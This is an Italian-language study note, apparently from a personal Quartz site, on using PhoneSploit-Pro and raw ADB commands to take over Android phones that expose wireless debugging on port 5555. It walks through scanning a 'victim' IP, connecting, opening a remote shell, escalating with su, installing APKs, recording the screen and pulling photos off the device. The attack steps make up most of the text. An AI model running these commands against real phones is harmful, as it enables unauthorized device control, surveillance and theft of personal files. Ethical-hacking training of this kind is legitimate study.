Quartz 4

PhoneSploit-Pro

2 min read

tags: PhoneSploitPro Mobile_Hacking Android_Hacking

PhoneSploitPro è uno strumento che sfrutta Android Debug Bridge (ADB) per ottenere il controllo di un dispositivo Android remoto. ADB, quando esposto sulla rete, permette connessioni senza autenticazione se la modalità di debug wireless è attiva sul dispositivo target, se la modalità di debug è impostato su USB l’attacco non funzionerà. Inoltre a parte particolari eccezioni come per esempio il port forwarding (che si presenta quando hai accesso al router della vittima, puoi configurare il port forwarning per reindirizzare la porta 5555 del dispositivo Android a una porta pubblica su internet. In questo modo, puoi connetterti al dispositivo da remoto tramite ADB) per effettuare questo attacco si deve essere sulla stessa rete locale perchè il firewall di Android blocca automaticamente la porta 5555 su reti al di fuori di quella domestica.

PhoneSploit-Pro

Questo strumento è davvero semplice da utilizzare lo si può scaricare da Github (è anche presente nei tool CEH).

Dopo essere entrati nella cartella PhoneSploit-Pro possiamo e aver accettato di proseguire possiamo inseire 1 che ci chiederà di inserire l’indirizzo IP della vittima se non appare subito connected riprova un po’ di volte prima di abbandonare:

Ora che ci siamo connessi possiamo scegliere fra qualsiasi di questi attacchi, ci basta inserire il numero dell’attacco che vogliamo effettuare e il gioco è fatto, ci sono tre pagine di attacco e ci si sposta fra esse tramite i tasti N e P.

Manuale

Le stesse operazioni che vengono automatizzate con lo strumento esposto sopra si possono anche fare manualmente attraverso ADB, ecco alcuni esempi:

 
#Verificare se il dispositivo ha il debug wireless attivo:
 
nmap -p 5555 <IP-Vittima>
 
#Connettersi al dispositivo:
 
adb connect <IP-Vittima>:5555
 
#Se la connessione è avvenuta con successo, puoi vedere il dispositivo con:
 
adb devices
 
#Una volta connesso, puoi aprire una shell remota sul dispositivo:
 
adb shell
 
#Se il dispositivo è rootato e vuoi eseguire comandi con permessi elevati:
 
adb shell su
 
#Installare un'app (APK) sulla vittima:
 
adb install <path_del_file.apk>
 
#Per rimuovere un’app installata:
 
adb uninstall <package_name>
 
#Per trovare il nome del package di un’app installata:
 
adb shell pm list packages | grep <nome-app>
 
#Catturare uno screenshot:
 
adb shell screencap -p /sdcard/screenshot.png
 
#Registrare lo schermo per 10 secondi:
 
adb shell screenrecord --time-limit 10 /sdcard/video.mp4
 
#Scaricare file dal dispositivo:
 
adb pull /sdcard/DCIM/photo.jpg
 
#Caricare un file nel dispositivo:
 
adb push file.txt /sdcard/

Graph View